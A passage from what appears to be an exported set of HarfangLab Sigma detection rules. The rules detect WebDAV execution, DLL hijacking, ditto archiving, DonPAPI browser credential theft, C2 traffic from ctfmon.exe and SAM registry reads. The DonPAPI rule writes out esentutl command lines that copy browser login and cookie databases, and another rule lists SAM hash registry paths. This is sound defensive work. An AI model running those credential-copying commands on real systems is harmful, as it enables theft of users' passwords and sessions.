"last_update": "2026-03-23T11:45:34.074206Z",
"creation_date": "2026-03-23T11:45:34.074208Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074212Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cert.gov.ua/article/6276894",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_execution_from_webdav.yml",
"content": "title: Suspicious Execution from WebDAV Share\nid: 2ccca8c6-4fec-4f8e-a3eb-c4693b526b28\ndescription: |\n Detects the execution of a process from a WebDAV share.\n WebDAV is an unusual location for binaries to be executed from.\n Attackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\n Is it recommended to analyze the executed binary and look malicious content or behavior.\nreferences:\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2024/01/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '\\\\\\\\*@80\\\\*'\n - '\\\\\\\\*@443\\\\*'\n - '\\\\\\\\*@SSL\\\\*'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28",
"rule_name": "Suspicious Execution from WebDAV Share",
"rule_description": "Detects the execution of a process from a WebDAV share.\nWebDAV is an unusual location for binaries to be executed from.\nAttackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\nIs it recommended to analyze the executed binary and look malicious content or behavior.\n",
"rule_creation_date": "2024-01-26",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600335Z",
"creation_date": "2026-03-23T11:45:34.600339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600346Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_set.yml",
"content": "title: DLL Hijacking via set.exe\nid: 2cdfd8e4-0fb6-42ec-83a6-010700352f20\ndescription: |\n Detects potential Windows DLL Hijacking via set.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setx.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20",
"rule_name": "DLL Hijacking via set.exe",
"rule_description": "Detects potential Windows DLL Hijacking via set.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d0520f1-59a9-4523-8001-7336ef5c28cc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618443Z",
"creation_date": "2026-03-23T11:45:34.618445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/1560/001/"
],
"name": "t1560_001_ditto_archive_creation.yml",
"content": "title: Archive Created via ditto\nid: 2d0520f1-59a9-4523-8001-7336ef5c28cc\ndescription: |\n Detects a suspicious archive creation using the ditto MacOS utility.\n Adversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\nreferences:\n - https://attack.mitre.org/techniques/1560/001/\ndate: 2024/06/13\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Ditto\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/ditto'\n CommandLine|contains|all:\n - ' -c'\n - ' --sequesterRsrc'\n - ' --keepParent'\n\n exclusion_airwatch:\n ProcessParentImage: '/Library/Application Support/AirWatch/hublogd'\n\n exclusion_outlook:\n ProcessParentImage: '/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d0520f1-59a9-4523-8001-7336ef5c28cc",
"rule_name": "Archive Created via ditto",
"rule_description": "Detects a suspicious archive creation using the ditto MacOS utility.\nAdversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\n",
"rule_creation_date": "2024-06-13",
"rule_modified_date": "2025-03-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1119",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087464Z",
"creation_date": "2026-03-23T11:45:34.087466Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087470Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/login-securite/DonPAPI/",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1555_003_donpapi_browser_credentials.yml",
"content": "title: Browser Credentials Gathered via DonPAPI\nid: 2d125387-a98b-4b47-843e-3e6a3fb7b5eb\ndescription: |\n Detects browser credential gathering via a legacy version of the DonPAPI tool.\n DonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\n DPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\n It is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\nreferences:\n - https://github.com/login-securite/DonPAPI/\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/03/05\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.credential_access\n - attack.t1555.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # CommandLine:\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c del ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Safe Browsing Network\\Safe Browsing Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies /d ?:\\Users\\\\*\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies.tmp'\n # - 'cmd.exe /Q /c esentutl.exe /y ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\* /d ?:\\Users\\\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\\\*\\\\*.tmp'\n ProcessParentName: wmiprvse.exe\n ProcessName: 'cmd.exe'\n CommandLine|re: '.*cmd.exe /Q /c esentutl.exe /y ([^/]*(/d )?){2}.tmp'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb",
"rule_name": "Browser Credentials Gathered via DonPAPI",
"rule_description": "Detects browser credential gathering via a legacy version of the DonPAPI tool.\nDonPAPI is a Python tool specialized in gathering DPAPI (Data Protection Application Programming Interface) protected credentials.\nDPAPI is a method to encrypt and decrypt sensitive data such as credentials using the CryptProtectData and CryptUnprotectData functions used in particular used by browsers.\nIt is recommended to investigate actions made by the child process and identify the source of the remote connection using authentication logs.\n",
"rule_creation_date": "2024-03-05",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d20cb47-e527-4738-b5ba-ab12cd7da516",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096927Z",
"creation_date": "2026-03-23T11:45:34.096929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096934Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxsunatd.yml",
"content": "title: DLL Hijacking via fxsunatd.exe\nid: 2d20cb47-e527-4738-b5ba-ab12cd7da516\ndescription: |\n Detects potential Windows DLL Hijacking via fxsunatd.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxsunatd.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\FXSAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d20cb47-e527-4738-b5ba-ab12cd7da516",
"rule_name": "DLL Hijacking via fxsunatd.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxsunatd.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d438226-15c9-4f1f-9818-560efb9ac7de",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605179Z",
"creation_date": "2026-03-23T11:45:34.605182Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605189Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ThePorgs/Exegol/",
"https://exegol.readthedocs.io/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_silent_workstation_name_exegol.yml",
"content": "title: Activity linked to Workstation Named Exegol\nid: 2d438226-15c9-4f1f-9818-560efb9ac7de\ndescription: |\n Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\n Attackers may connect external machines to the network to conduct malicious activities.\n It is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\nreferences:\n - https://github.com/ThePorgs/Exegol/\n - https://exegol.readthedocs.io/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2025/06/04\nmodified: 2025/06/10\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.Exegol\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n - Workstation|startswith: 'exegol-'\n - WorkstationName|startswith: 'exegol-'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d438226-15c9-4f1f-9818-560efb9ac7de",
"rule_name": "Activity linked to Workstation Named Exegol",
"rule_description": "Detects an activity from a machine whose name is Exegol, a fully configured Linux-based Docker image for penetration testing and red teaming.\nAttackers may connect external machines to the network to conduct malicious activities.\nIt is recommended to check if the machine is expected in the network and for other malicious activity from the machine's IP address.\n",
"rule_creation_date": "2025-06-04",
"rule_modified_date": "2025-06-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081072Z",
"creation_date": "2026-03-23T11:45:34.081075Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081079Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/Cryptolaemus1/status/1759740446857625639",
"https://twitter.com/reecdeep/status/1759603556288459149",
"https://attack.mitre.org/techniques/T1055/",
"https://attack.mitre.org/techniques/T1571/"
],
"name": "t1055_ctfmon_suspicious_network_communication.yml",
"content": "title: Suspicious ctfmon.exe Network Communication\nid: 2d48e659-e7f3-42cc-ab39-2bb7040a806c\ndescription: |\n Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\n This can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\n This technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\n It has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\n It is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\n Additionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1759740446857625639\n - https://twitter.com/reecdeep/status/1759603556288459149\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/techniques/T1571/\ndate: 2024/02/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.command_and_control\n - attack.t1571\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: network_connection\n product: windows\ndetection:\n selection:\n ProcessOriginalFileName: 'CTFMON.EXE'\n ProcessParentCommandLine|contains: '?'\n\n filter_parent:\n ProcessParentCommandLine:\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService'\n - '?:\\WINDOWS\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TextInputManagementService'\n\n filter_ip:\n DestinationIp|cidr:\n - '0.0.0.0/8' # RFC 1122, Section 3.2.1.3 \"This\" Network*\n - '10.0.0.0/8' # RFC 1918 Private-Use Networks*\n - '127.0.0.0/8' # RFC 1122, Section 3.2.1.3 Loopback*\n - '169.254.0.0/16' # RFC 3927 Link Local*\n - '172.16.0.0/12' # RFC 1918 Private-Use Networks*\n - '192.0.0.0/24' # RFC 5736 IETF Protocol Assignments*\n - '192.0.2.0/24' # RFC 5737 TEST-NET-1*\n - '192.88.99.0/24' # RFC 3068 6to4 Relay Anycast*\n - '192.168.0.0/16' # RFC 1918 Private-Use Networks*\n - '198.18.0.0/15' # RFC 2544 Network Interconnect Device Benchmark Testing*\n - '198.51.100.0/24' # RFC 5737 TEST-NET-2*\n - '203.0.113.0/24' # RFC 5737 TEST-NET-3*\n - '224.0.0.0/4' # RFC 3171 Multicast*\n - '240.0.0.0/4' # RFC 1112, Section 4 Reserved for Future Use*\n - '255.255.255.255/32' # RFC 919, Section 7 Limited Broadcast*\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2d48e659-e7f3-42cc-ab39-2bb7040a806c",
"rule_name": "Suspicious ctfmon.exe Network Communication",
"rule_description": "Detects network communications via a non-standard port from the legitimate ctfmon.exe Windows binary.\nThis can indicate malicious activity, such as communication with a C2 server, after an adversary injects malicious code into a suspended and hollowed process to evade process-based defenses.\nThis technique is often used by attackers to establish command-and-control (C2) communication while maintaining persistence and evading detection.\nIt has been observed in attacks such as those involving the Pikabot Malware, which used this method to deploy the Medusa Stealer.\nIt is recommended to investigate the parent process responsible for initiating this communication, analyze the network traffic details, and examine the destination IP address to determine the legitimacy of the activity.\nAdditionally, trying to dump the ctfmon.exe process for analysis can be useful to ensure it is not being abused for malicious purposes.\n",
"rule_creation_date": "2024-02-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055",
"attack.t1071.001",
"attack.t1571"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2d774838-fe3c-4704-a1c2-8e1287b6b0ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095725Z",
"creation_date": "2026-03-23T11:45:34.095728Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095732Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md",
"https://attack.mitre.org/techniques/T1003/002/"
],
"name": "t1003_002_susp_sam_database_accessed.yml",
"content": "title: SAM Database Read from Registry via Samdump\nid: 2d774838-fe3c-4704-a1c2-8e1287b6b0ee\ndescription: |\n Detects a suspicious read operation on registry keys storing Windows account parameters.\n Adversaries may extract user information stored in SAM database to retrieve user's password hashes.\n It is recommended to check whether the process accessing the registry keys has legitimate reasons to do it.\nreferences:\n - https://github.com/matteodalgrande/windows-hash-crack-python37/blob/master/README.md\n - https://attack.mitre.org/techniques/T1003/002/\ndate: 2024/04/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.discovery\n - attack.t1012\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'ReadValue'\n TargetObject:\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\F'\n - 'HKLM\\SAM\\SAM\\Domains\\Account\\Users\\\\*\\V'\n Image|contains: '?'\n\n filter_lsass:\n - Image:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n - ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_remote_registry:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - 